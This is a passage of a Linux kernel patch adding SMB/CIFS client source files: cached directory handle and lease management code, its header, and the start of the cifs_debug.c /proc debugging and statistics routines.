++		if (dentry && cfid->dentry == dentry) {
++			cifs_dbg(FYI, "found a cached root file handle by dentry\n");
++			kref_get(&cfid->refcount);
++			*ret_cfid = cfid;
++			spin_unlock(&cfids->cfid_list_lock);
++			return 0;
++		}
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	return -ENOENT;
++}
++
++static void
++smb2_close_cached_fid(struct kref *ref)
++{
++	struct cached_fid *cfid = container_of(ref, struct cached_fid,
++					       refcount);
++
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	if (cfid->on_list) {
++		list_del(&cfid->entry);
++		cfid->on_list = false;
++		cfid->cfids->num_entries--;
++	}
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++
++	dput(cfid->dentry);
++	cfid->dentry = NULL;
++
++	if (cfid->is_open) {
++		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
++	}
++
++	free_cached_dir(cfid);
++}
++
++void drop_cached_dir_by_name(const unsigned int xid, struct cifs_tcon *tcon,
++			     const char *name, struct cifs_sb_info *cifs_sb)
++{
++	struct cached_fid *cfid = NULL;
++	int rc;
++
++	rc = open_cached_dir(xid, tcon, name, cifs_sb, true, &cfid);
++	if (rc) {
++		cifs_dbg(FYI, "no cached dir found for rmdir(%s)\n", name);
++		return;
++	}
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	if (cfid->has_lease) {
++		cfid->has_lease = false;
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++	close_cached_dir(cfid);
++}
++
++
++void close_cached_dir(struct cached_fid *cfid)
++{
++	kref_put(&cfid->refcount, smb2_close_cached_fid);
++}
++
++/*
++ * Called from cifs_kill_sb when we unmount a share
++ */
++void close_all_cached_dirs(struct cifs_sb_info *cifs_sb)
++{
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct cached_fid *cfid;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cached_fids *cfids;
++
++	for (node = rb_first(root); node; node = rb_next(node)) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++		tcon = tlink_tcon(tlink);
++		if (IS_ERR(tcon))
++			continue;
++		cfids = tcon->cfids;
++		if (cfids == NULL)
++			continue;
++		list_for_each_entry(cfid, &cfids->entries, entry) {
++			dput(cfid->dentry);
++			cfid->dentry = NULL;
++		}
++	}
++}
++
++/*
++ * Invalidate all cached dirs when a TCON has been reset
++ * due to a session loss.
++ */
++void invalidate_all_cached_dirs(struct cifs_tcon *tcon)
++{
++	struct cached_fids *cfids = tcon->cfids;
++	struct cached_fid *cfid, *q;
++	LIST_HEAD(entry);
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
++		list_move(&cfid->entry, &entry);
++		cfids->num_entries--;
++		cfid->is_open = false;
++		cfid->on_list = false;
++		/* To prevent race with smb2_cached_lease_break() */
++		kref_get(&cfid->refcount);
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++
++	list_for_each_entry_safe(cfid, q, &entry, entry) {
++		list_del(&cfid->entry);
++		cancel_work_sync(&cfid->lease_break);
++		if (cfid->has_lease) {
++			/*
++			 * We lease was never cancelled from the server so we
++			 * need to drop the reference.
++			 */
++			spin_lock(&cfids->cfid_list_lock);
++			cfid->has_lease = false;
++			spin_unlock(&cfids->cfid_list_lock);
++			kref_put(&cfid->refcount, smb2_close_cached_fid);
++		}
++		/* Drop the extra reference opened above*/
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
++}
++
++static void
++smb2_cached_lease_break(struct work_struct *work)
++{
++	struct cached_fid *cfid = container_of(work,
++				struct cached_fid, lease_break);
++
++	spin_lock(&cfid->cfids->cfid_list_lock);
++	cfid->has_lease = false;
++	spin_unlock(&cfid->cfids->cfid_list_lock);
++	kref_put(&cfid->refcount, smb2_close_cached_fid);
++}
++
++int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16])
++{
++	struct cached_fids *cfids = tcon->cfids;
++	struct cached_fid *cfid;
++
++	if (cfids == NULL)
++		return false;
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry(cfid, &cfids->entries, entry) {
++		if (cfid->has_lease &&
++		    !memcmp(lease_key,
++			    cfid->fid.lease_key,
++			    SMB2_LEASE_KEY_SIZE)) {
++			cfid->time = 0;
++			/*
++			 * We found a lease remove it from the list
++			 * so no threads can access it.
++			 */
++			list_del(&cfid->entry);
++			cfid->on_list = false;
++			cfids->num_entries--;
++
++			queue_work(cifsiod_wq,
++				   &cfid->lease_break);
++			spin_unlock(&cfids->cfid_list_lock);
++			return true;
++		}
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++	return false;
++}
++
++static struct cached_fid *init_cached_dir(const char *path)
++{
++	struct cached_fid *cfid;
++
++	cfid = kzalloc(sizeof(*cfid), GFP_ATOMIC);
++	if (!cfid)
++		return NULL;
++	cfid->path = kstrdup(path, GFP_ATOMIC);
++	if (!cfid->path) {
++		kfree(cfid);
++		return NULL;
++	}
++
++	INIT_WORK(&cfid->lease_break, smb2_cached_lease_break);
++	INIT_LIST_HEAD(&cfid->entry);
++	INIT_LIST_HEAD(&cfid->dirents.entries);
++	mutex_init(&cfid->dirents.de_mutex);
++	spin_lock_init(&cfid->fid_lock);
++	kref_init(&cfid->refcount);
++	return cfid;
++}
++
++static void free_cached_dir(struct cached_fid *cfid)
++{
++	struct cached_dirent *dirent, *q;
++
++	dput(cfid->dentry);
++	cfid->dentry = NULL;
++
++	/*
++	 * Delete all cached dirent names
++	 */
++	list_for_each_entry_safe(dirent, q, &cfid->dirents.entries, entry) {
++		list_del(&dirent->entry);
++		kfree(dirent->name);
++		kfree(dirent);
++	}
++
++	kfree(cfid->path);
++	cfid->path = NULL;
++	kfree(cfid);
++}
++
++struct cached_fids *init_cached_dirs(void)
++{
++	struct cached_fids *cfids;
++
++	cfids = kzalloc(sizeof(*cfids), GFP_KERNEL);
++	if (!cfids)
++		return NULL;
++	spin_lock_init(&cfids->cfid_list_lock);
++	INIT_LIST_HEAD(&cfids->entries);
++	return cfids;
++}
++
++/*
++ * Called from tconInfoFree when we are tearing down the tcon.
++ * There are no active users or open files/directories at this point.
++ */
++void free_cached_dirs(struct cached_fids *cfids)
++{
++	struct cached_fid *cfid, *q;
++	LIST_HEAD(entry);
++
++	spin_lock(&cfids->cfid_list_lock);
++	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
++		cfid->on_list = false;
++		cfid->is_open = false;
++		list_move(&cfid->entry, &entry);
++	}
++	spin_unlock(&cfids->cfid_list_lock);
++
++	list_for_each_entry_safe(cfid, q, &entry, entry) {
++		list_del(&cfid->entry);
++		free_cached_dir(cfid);
++	}
++
++	kfree(cfids);
++}
+diff --git a/fs/smb/client/cached_dir.h b/fs/smb/client/cached_dir.h
+new file mode 100644
+index 0000000000000..2f4e764c9ca9a
+--- /dev/null
++++ b/fs/smb/client/cached_dir.h
+@@ -0,0 +1,80 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ *  Functions to handle the cached directory entries
++ *
++ *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
++ */
++
++#ifndef _CACHED_DIR_H
++#define _CACHED_DIR_H
++
++
++struct cached_dirent {
++	struct list_head entry;
++	char *name;
++	int namelen;
++	loff_t pos;
++
++	struct cifs_fattr fattr;
++};
++
++struct cached_dirents {
++	bool is_valid:1;
++	bool is_failed:1;
++	struct dir_context *ctx; /*
++				  * Only used to make sure we only take entries
++				  * from a single context. Never dereferenced.
++				  */
++	struct mutex de_mutex;
++	int pos;		 /* Expected ctx->pos */
++	struct list_head entries;
++};
++
++struct cached_fid {
++	struct list_head entry;
++	struct cached_fids *cfids;
++	const char *path;
++	bool has_lease:1;
++	bool is_open:1;
++	bool on_list:1;
++	bool file_all_info_is_valid:1;
++	unsigned long time; /* jiffies of when lease was taken */
++	struct kref refcount;
++	struct cifs_fid fid;
++	spinlock_t fid_lock;
++	struct cifs_tcon *tcon;
++	struct dentry *dentry;
++	struct work_struct lease_break;
++	struct smb2_file_all_info file_all_info;
++	struct cached_dirents dirents;
++};
++
++#define MAX_CACHED_FIDS 16
++struct cached_fids {
++	/* Must be held when:
++	 * - accessing the cfids->entries list
++	 */
++	spinlock_t cfid_list_lock;
++	int num_entries;
++	struct list_head entries;
++};
++
++extern struct cached_fids *init_cached_dirs(void);
++extern void free_cached_dirs(struct cached_fids *cfids);
++extern int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
++			   const char *path,
++			   struct cifs_sb_info *cifs_sb,
++			   bool lookup_only, struct cached_fid **cfid);
++extern int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
++				     struct dentry *dentry,
++				     struct cached_fid **cfid);
++extern void close_cached_dir(struct cached_fid *cfid);
++extern void drop_cached_dir_by_name(const unsigned int xid,
++				    struct cifs_tcon *tcon,
++				    const char *name,
++				    struct cifs_sb_info *cifs_sb);
++extern void close_all_cached_dirs(struct cifs_sb_info *cifs_sb);
++extern void invalidate_all_cached_dirs(struct cifs_tcon *tcon);
++extern int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16]);
++
++#endif			/* _CACHED_DIR_H */
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+new file mode 100644
+index 0000000000000..e41154ad96afc
+--- /dev/null
++++ b/fs/smb/client/cifs_debug.c
+@@ -0,0 +1,1067 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2000,2005
++ *
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++#include <linux/fs.h>
++#include <linux/string.h>
++#include <linux/ctype.h>
++#include <linux/module.h>
++#include <linux/proc_fs.h>
++#include <linux/uaccess.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++#include "fs_context.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#include "smbdirect.h"
++#endif
++#include "cifs_swn.h"
++
++void
++cifs_dump_mem(char *label, void *data, int length)
++{
++	pr_debug("%s: dump of %d bytes of data at 0x%p\n", label, length, data);
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_OFFSET, 16, 4,
++		       data, length, true);
++}
++
++void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct smb_hdr *smb = buf;
++
++	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
++		 smb->Command, smb->Status.CifsError,
++		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
++	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
++		 server->ops->calc_smb_size(smb));
++#endif /* CONFIG_CIFS_DEBUG2 */
++}
++
++void cifs_dump_mids(struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct mid_q_entry *mid_entry;
++
++	if (server == NULL)
++		return;
++
++	cifs_dbg(VFS, "Dump pending requests:\n");
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
++		cifs_dbg(VFS, "State: %d Cmd: %d Pid: %d Cbdata: %p Mid %llu\n",
++			 mid_entry->mid_state,
++			 le16_to_cpu(mid_entry->command),
++			 mid_entry->pid,
++			 mid_entry->callback_data,
++			 mid_entry->mid);
++#ifdef CONFIG_CIFS_STATS2
++		cifs_dbg(VFS, "IsLarge: %d buf: %p time rcv: %ld now: %ld\n",
++			 mid_entry->large_buf,
++			 mid_entry->resp_buf,
++			 mid_entry->when_received,
++			 jiffies);
++#endif /* STATS2 */
++		cifs_dbg(VFS, "IsMult: %d IsEnd: %d\n",
++			 mid_entry->multiRsp, mid_entry->multiEnd);
++		if (mid_entry->resp_buf) {
++			cifs_dump_detail(mid_entry->resp_buf, server);
++			cifs_dump_mem("existing buf: ",
++				mid_entry->resp_buf, 62);
++		}
++	}
++	spin_unlock(&server->mid_lock);
++#endif /* CONFIG_CIFS_DEBUG2 */
++}
++
++#ifdef CONFIG_PROC_FS
++static void cifs_debug_tcon(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	__u32 dev_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
++
++	seq_printf(m, "%s Mounts: %d ", tcon->tree_name, tcon->tc_count);
++	if (tcon->nativeFileSystem)
++		seq_printf(m, "Type: %s ", tcon->nativeFileSystem);
++	seq_printf(m, "DevInfo: 0x%x Attributes: 0x%x\n\tPathComponentMax: %d Status: %d",
++		   le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics),
++		   le32_to_cpu(tcon->fsAttrInfo.Attributes),
++		   le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength),
++		   tcon->status);
++	if (dev_type == FILE_DEVICE_DISK)
++		seq_puts(m, " type: DISK ");
++	else if (dev_type == FILE_DEVICE_CD_ROM)
++		seq_puts(m, " type: CDROM ");
++	else
++		seq_printf(m, " type: %d ", dev_type);
++
++	seq_printf(m, "Serial Number: 0x%x", tcon->vol_serial_number);
++
++	if ((tcon->seal) ||
++	    (tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
++	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
++		seq_printf(m, " Encrypted");
++	if (tcon->nocase)
++		seq_printf(m, " nocase");
++	if (tcon->unix_ext)
++		seq_printf(m, " POSIX Extensions");
++	if (tcon->ses->server->ops->dump_share_caps)
++		tcon->ses->server->ops->dump_share_caps(m, tcon);
++	if (tcon->use_witness)
++		seq_puts(m, " Witness");
++	if (tcon->broken_sparse_sup)
++		seq_puts(m, " nosparse");
++	if (tcon->need_reconnect)
++		seq_puts(m, "\tDISCONNECTED ");
++	seq_putc(m, '\n');
++}
++
++static void
++cifs_dump_channel(struct seq_file *m, int i, struct cifs_chan *chan)
++{
++	struct TCP_Server_Info *server = chan->server;
++
++	seq_printf(m, "\n\n\t\tChannel: %d ConnectionId: 0x%llx"
++		   "\n\t\tNumber of credits: %d Dialect 0x%x"
++		   "\n\t\tTCP status: %d Instance: %d"
++		   "\n\t\tLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d"
++		   "\n\t\tIn Send: %d In MaxReq Wait: %d",
++		   i+1, server->conn_id,
++		   server->credits,
++		   server->dialect,
++		   server->tcpStatus,
++		   server->reconnect_instance,
++		   server->srv_count,
++		   server->sec_mode,
++		   in_flight(server),
++		   atomic_read(&server->in_send),
++		   atomic_read(&server->num_waiters));
++}
++
++static void
++cifs_dump_iface(struct seq_file *m, struct cifs_server_iface *iface)
++{
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
++
++	seq_printf(m, "\tSpeed: %zu bps\n", iface->speed);
++	seq_puts(m, "\t\tCapabilities: ");
++	if (iface->rdma_capable)
++		seq_puts(m, "rdma ");
++	if (iface->rss_capable)
++		seq_puts(m, "rss ");
++	seq_putc(m, '\n');
++	if (iface->sockaddr.ss_family == AF_INET)
++		seq_printf(m, "\t\tIPv4: %pI4\n", &ipv4->sin_addr);
++	else if (iface->sockaddr.ss_family == AF_INET6)
++		seq_printf(m, "\t\tIPv6: %pI6\n", &ipv6->sin6_addr);
++	if (!iface->is_active)
++		seq_puts(m, "\t\t[for-cleanup]\n");
++}
++
++static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
++{
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++
++	seq_puts(m, "# Version:1\n");
++	seq_puts(m, "# Format:\n");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
++#ifdef CONFIG_CIFS_DEBUG2
++	seq_printf(m, " <filename> <mid>\n");
++#else
++	seq_printf(m, " <filename>\n");
++#endif /* CIFS_DEBUG2 */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				spin_lock(&tcon->open_file_lock);
++				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++					seq_printf(m,
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
++						tcon->tid,
++						ses->Suid,
++						cfile->fid.persistent_fid,
++						cfile->f_flags,
++						cfile->count,
++						cfile->pid,
++						from_kuid(&init_user_ns, cfile->uid),
++						cfile->dentry);
++#ifdef CONFIG_CIFS_DEBUG2
++					seq_printf(m, " %llu\n", cfile->fid.mid);
++#else
++					seq_printf(m, "\n");
++#endif /* CIFS_DEBUG2 */
++				}
++				spin_unlock(&tcon->open_file_lock);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	seq_putc(m, '\n');
++	return 0;
++}
++
++static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
++{
++	struct mid_q_entry *mid_entry;
++	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifs_server_iface *iface;
++	int c, i, j;
++
++	seq_puts(m,
++		    "Display Internal CIFS Data Structures for Debugging\n"
++		    "---------------------------------------------------\n");
++	seq_printf(m, "CIFS Version %s\n", CIFS_VERSION);
++	seq_printf(m, "Features:");
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	seq_printf(m, " DFS");
++#endif
++#ifdef CONFIG_CIFS_FSCACHE
++	seq_printf(m, ",FSCACHE");
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	seq_printf(m, ",SMB_DIRECT");
++#endif
++#ifdef CONFIG_CIFS_STATS2
++	seq_printf(m, ",STATS2");
++#else
++	seq_printf(m, ",STATS");
++#endif
++#ifdef CONFIG_CIFS_DEBUG2
++	seq_printf(m, ",DEBUG2");
++#elif defined(CONFIG_CIFS_DEBUG)
++	seq_printf(m, ",DEBUG");
++#endif
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	seq_printf(m, ",ALLOW_INSECURE_LEGACY");
++#endif
++#ifdef CONFIG_CIFS_POSIX
++	seq_printf(m, ",CIFS_POSIX");
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	seq_printf(m, ",UPCALL(SPNEGO)");
++#endif
++#ifdef CONFIG_CIFS_XATTR
++	seq_printf(m, ",XATTR");
++#endif
++	seq_printf(m, ",ACL");
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	seq_puts(m, ",WITNESS");
++#endif
++	seq_putc(m, '\n');
++	seq_printf(m, "CIFSMaxBufSize: %d\n", CIFSMaxBufSize);
++	seq_printf(m, "Active VFS Requests: %d\n", GlobalTotalActiveXid);
++
++	seq_printf(m, "\nServers: ");
++
++	c = 0;
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		/* channel info will be printed as a part of sessions below */
++		if (CIFS_SERVER_IS_CHAN(server))
++			continue;
++
++		c++;
++		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
++			c, server->conn_id);
++
++		spin_lock(&server->srv_lock);
++		if (server->hostname)
++			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		if (!server->rdma)
++			goto skip_rdma;
++
++		if (!server->smbd_conn) {
++			seq_printf(m, "\nSMBDirect transport not available");
++			goto skip_rdma;
++		}
++
++		seq_printf(m, "\nSMBDirect (in hex) protocol version: %x "
++			"transport status: %x",
++			server->smbd_conn->protocol,
++			server->smbd_conn->transport_status);
++		seq_printf(m, "\nConn receive_credit_max: %x "
++			"send_credit_target: %x max_send_size: %x",
++			server->smbd_conn->receive_credit_max,
++			server->smbd_conn->send_credit_target,
++			server->smbd_conn->max_send_size);
++		seq_printf(m, "\nConn max_fragmented_recv_size: %x "
++			"max_fragmented_send_size: %x max_receive_size:%x",
++			server->smbd_conn->max_fragmented_recv_size,
++			server->smbd_conn->max_fragmented_send_size,
++			server->smbd_conn->max_receive_size);
++		seq_printf(m, "\nConn keep_alive_interval: %x "
++			"max_readwrite_size: %x rdma_readwrite_threshold: %x",
++			server->smbd_conn->keep_alive_interval,
++			server->smbd_conn->max_readwrite_size,
++			server->smbd_conn->rdma_readwrite_threshold);
++		seq_printf(m, "\nDebug count_get_receive_buffer: %x "
++			"count_put_receive_buffer: %x count_send_empty: %x",
++			server->smbd_conn->count_get_receive_buffer,
++			server->smbd_conn->count_put_receive_buffer,
++			server->smbd_conn->count_send_empty);
++		seq_printf(m, "\nRead Queue count_reassembly_queue: %x "
++			"count_enqueue_reassembly_queue: %x "
++			"count_dequeue_reassembly_queue: %x "
++			"fragment_reassembly_remaining: %x "
++			"reassembly_data_length: %x "
++			"reassembly_queue_length: %x",
++			server->smbd_conn->count_reassembly_queue,
++			server->smbd_conn->count_enqueue_reassembly_queue,
++			server->smbd_conn->count_dequeue_reassembly_queue,
++			server->smbd_conn->fragment_reassembly_remaining,
++			server->smbd_conn->reassembly_data_length,
++			server->smbd_conn->reassembly_queue_length);
++		seq_printf(m, "\nCurrent Credits send_credits: %x "
++			"receive_credits: %x receive_credit_target: %x",
++			atomic_read(&server->smbd_conn->send_credits),
++			atomic_read(&server->smbd_conn->receive_credits),
++			server->smbd_conn->receive_credit_target);
++		seq_printf(m, "\nPending send_pending: %x ",
++			atomic_read(&server->smbd_conn->send_pending));
++		seq_printf(m, "\nReceive buffers count_receive_queue: %x "
++			"count_empty_packet_queue: %x",
++			server->smbd_conn->count_receive_queue,
++			server->smbd_conn->count_empty_packet_queue);
++		seq_printf(m, "\nMR responder_resources: %x "
++			"max_frmr_depth: %x mr_type: %x",
++			server->smbd_conn->responder_resources,
++			server->smbd_conn->max_frmr_depth,
++			server->smbd_conn->mr_type);
++		seq_printf(m, "\nMR mr_ready_count: %x mr_used_count: %x",
++			atomic_read(&server->smbd_conn->mr_ready_count),
++			atomic_read(&server->smbd_conn->mr_used_count));
++skip_rdma:
++#endif
++		seq_printf(m, "\nNumber of credits: %d Dialect 0x%x",
++			server->credits,  server->dialect);
++		if (server->compress_algorithm == SMB3_COMPRESS_LZNT1)
++			seq_printf(m, " COMPRESS_LZNT1");
++		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77)
++			seq_printf(m, " COMPRESS_LZ77");
++		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77_HUFF)
++			seq_printf(m, " COMPRESS_LZ77_HUFF");
++		if (server->sign)
++			seq_printf(m, " signed");
++		if (server->posix_ext_supported)
++			seq_printf(m, " posix");
++		if (server->nosharesock)
++			seq_printf(m, " nosharesock");
++
++		if (server->rdma)
++			seq_printf(m, "\nRDMA ");
++		seq_printf(m, "\nTCP status: %d Instance: %d"
++				"\nLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d",
++				server->tcpStatus,
++				server->reconnect_instance,
++				server->srv_count,
++				server->sec_mode, in_flight(server));
++
++		seq_printf(m, "\nIn Send: %d In MaxReq Wait: %d",
++				atomic_read(&server->in_send),
++				atomic_read(&server->num_waiters));
++
++		seq_printf(m, "\n\n\tSessions: ");
++		i = 0;
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			i++;
++			if ((ses->serverDomain == NULL) ||
++				(ses->serverOS == NULL) ||
++				(ses->serverNOS == NULL)) {
++				seq_printf(m, "\n\t%d) Address: %s Uses: %d Capability: 0x%x\tSession Status: %d ",
++					i, ses->ip_addr, ses->ses_count,
++					ses->capabilities, ses->ses_status);
++				if (ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
++					seq_printf(m, "Guest ");
++				else if (ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
++					seq_printf(m, "Anonymous ");
++			} else {
++				seq_printf(m,
++				    "\n\t%d) Name: %s  Domain: %s Uses: %d OS: %s "
++				    "\n\tNOS: %s\tCapability: 0x%x"
++					"\n\tSMB session status: %d ",
++				i, ses->ip_addr, ses->serverDomain,
++				ses->ses_count, ses->serverOS, ses->serverNOS,
++				ses->capabilities, ses->ses_status);
++			}
++
++			seq_printf(m, "\n\tSecurity type: %s ",
++				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
++
++			/* dump session id helpful for use with network trace */
++			seq_printf(m, " SessionId: 0x%llx", ses->Suid);
++			if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
++				seq_puts(m, " encrypted");
++			if (ses->sign)
++				seq_puts(m, " signed");
++
++			seq_printf(m, "\n\tUser: %d Cred User: %d",
++				   from_kuid(&init_user_ns, ses->linux_uid),
++				   from_kuid(&init_user_ns, ses->cred_uid));
++
++			spin_lock(&ses->chan_lock);
++			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
++				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
++			if (CIFS_CHAN_IN_RECONNECT(ses, 0))
++				seq_puts(m, "\t[RECONNECTING] ");
++
++			if (ses->chan_count > 1) {
++				seq_printf(m, "\n\n\tExtra Channels: %zu ",
++					   ses->chan_count-1);
++				for (j = 1; j < ses->chan_count; j++) {
++					cifs_dump_channel(m, j, &ses->chans[j]);
++					if (CIFS_CHAN_NEEDS_RECONNECT(ses, j))
++						seq_puts(m, "\tDISCONNECTED ");
++					if (CIFS_CHAN_IN_RECONNECT(ses, j))
++						seq_puts(m, "\t[RECONNECTING] ");
++				}
++			}
++			spin_unlock(&ses->chan_lock);
++
++			seq_puts(m, "\n\n\tShares: ");
++			j = 0;
++
++			seq_printf(m, "\n\t%d) IPC: ", j);
++			if (ses->tcon_ipc)
++				cifs_debug_tcon(m, ses->tcon_ipc);
++			else
++				seq_puts(m, "none\n");
++
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				++j;
++				seq_printf(m, "\n\t%d) ", j);
++				cifs_debug_tcon(m, tcon);
++			}
++
++			spin_lock(&ses->iface_lock);
++			if (ses->iface_count)
++				seq_printf(m, "\n\n\tServer interfaces: %zu",
++					   ses->iface_count);
++			j = 0;
++			list_for_each_entry(iface, &ses->iface_list,
++						 iface_head) {
++				seq_printf(m, "\n\t%d)", ++j);
++				cifs_dump_iface(m, iface);
++				if (is_ses_using_iface(ses, iface))
++					seq_puts(m, "\t\t[CONNECTED]\n");
++			}
++			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
++		}
++		if (i == 0)
++			seq_printf(m, "\n\t\t[NONE]");
++	}
++	if (c == 0)
++		seq_printf(m, "\n\t[NONE]");
++
++	spin_unlock(&cifs_tcp_ses_lock);
++	seq_putc(m, '\n');
++	cifs_swn_dump(m);
++
++	/* BB add code to dump additional info such as TCP session info now */
++	return 0;
++}
++
++static ssize_t cifs_stats_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	bool bv;
++	int rc;
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	rc = kstrtobool_from_user(buffer, count, &bv);
++	if (rc == 0) {
++#ifdef CONFIG_CIFS_STATS2
++		int i;
++
++		atomic_set(&total_buf_alloc_count, 0);
++		atomic_set(&total_small_buf_alloc_count, 0);
++#endif /* CONFIG_CIFS_STATS2 */
++		atomic_set(&tcpSesReconnectCount, 0);
++		atomic_set(&tconInfoReconnectCount, 0);
++
++		spin_lock(&GlobalMid_Lock);
++		GlobalMaxActiveXid = 0;
++		GlobalCurrentXid = 0;
++		spin_unlock(&GlobalMid_Lock);
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++			server->max_in_flight = 0;
++#ifdef CONFIG_CIFS_STATS2
++			for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
++				atomic_set(&server->num_cmds[i], 0);
++				atomic_set(&server->smb2slowcmd[i], 0);
++				server->time_per_cmd[i] = 0;
++				server->slowest_cmd[i] = 0;
++				server->fastest_cmd[0] = 0;
++			}
++#endif /* CONFIG_CIFS_STATS2 */
++			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++					atomic_set(&tcon->num_smbs_sent, 0);
++					spin_lock(&tcon->stat_lock);
++					tcon->bytes_read = 0;
++					tcon->bytes_written = 0;
++					spin_unlock(&tcon->stat_lock);
++					if (server->ops->clear_stats)
++						server->ops->clear_stats(tcon);
